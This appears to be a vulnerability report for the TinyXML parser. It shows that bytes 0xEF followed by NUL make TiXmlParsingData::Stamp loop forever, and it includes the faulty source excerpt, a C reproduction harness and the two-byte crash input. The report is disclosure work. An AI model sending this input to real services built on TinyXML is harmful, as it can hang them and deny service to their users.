TIXML_UTF_LEAD_0 can cause TinyXML DoS
Brought to you by:
leethomason
This vulnerability is caused by the following code (tinyxmlparser.cpp, line 212), which does not advance p in the UTF-8 branch when either of the two bytes following TIXML_UTF_LEAD_0 is NUL:
// Excerpt of the scanning loop: walks p towards now, updating col as it goes.
// The loop can only terminate if every path through the body advances p.
while ( p < now )
{
// Treat p as unsigned, so we have a happy compiler.
const unsigned char* pU = (const unsigned char*)p;
// Code contributed by Fletcher Dunn: (modified by lee)
switch (*pU) {
// ...
case TIXML_UTF_LEAD_0:
if ( encoding == TIXML_ENCODING_UTF8 )
{
// Only look at the next two bytes when neither of them is NUL.
if ( *(p+1) && *(p+2) )
{
// In these cases, don't advance the column. These are
// 0-width spaces.
if ( *(pU+1)==TIXML_UTF_LEAD_1 && *(pU+2)==TIXML_UTF_LEAD_2 )
p += 3;
else if ( *(pU+1)==0xbfU && *(pU+2)==0xbeU )
p += 3;
else if ( *(pU+1)==0xbfU && *(pU+2)==0xbfU )
p += 3;
else
{ p +=3; ++col; } // A normal character.
}
// NOTE: there is no else branch for the check above. When *(p+1) or
// *(p+2) is NUL, this case leaves p unchanged, so the next iteration
// sees the same byte again and `p < now` stays true.
}
else
{
// Not UTF-8: the lead byte is treated as a single one-column character.
++p;
++col;
}
break;
// ...
}
}
My test program:
#include "tinyxml.h"
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
// Reproduction harness: reads up to (1 MiB - 1) bytes from the file named by
// argv[1] and hands them to TiXmlDocument::Parse as a NUL-terminated string.
//
// Returns 0 after parsing (or when no file argument is given), and -1 when
// the file cannot be opened or read, or the buffer cannot be allocated.
int main(int argc, char*argv[]){
    if(argc < 2){
        printf("args error\n");
        return 0;
    }

    // The harness only reads the test case, so read-only access is enough
    // and also works for files without write permission.
    int fd = open(argv[1], O_RDONLY);
    // open() reports failure with -1; 0 is a valid descriptor.
    if(fd < 0){
        printf("open failed\n");
        return -1;
    }

    int bytes = 1024 * 1024;
    char *buffer = (char*)malloc(bytes);
    if(!buffer){
        printf("malloc failed\n");
        close(fd);
        return -1;
    }

    // Leave room for the terminator written below.
    int n = read(fd, buffer, bytes-1);
    if(n < 0){
        printf("read failed\n");
        free(buffer);
        close(fd);
        return -1;
    }
    // Parse() is handed only a pointer, so the data must be NUL-terminated;
    // malloc() does not zero the buffer.
    buffer[n] = '\0';
    printf("read %d bytes\n", n);

    TiXmlDocument doc;
    doc.Parse(buffer);

    close(fd);
    free(buffer);
    return 0;
}
./harness ./test_case
My test case is in the attachment. The input
\xef\0
causes TiXmlParsingData::Stamp to loop forever, so I think this can be described as a DoS.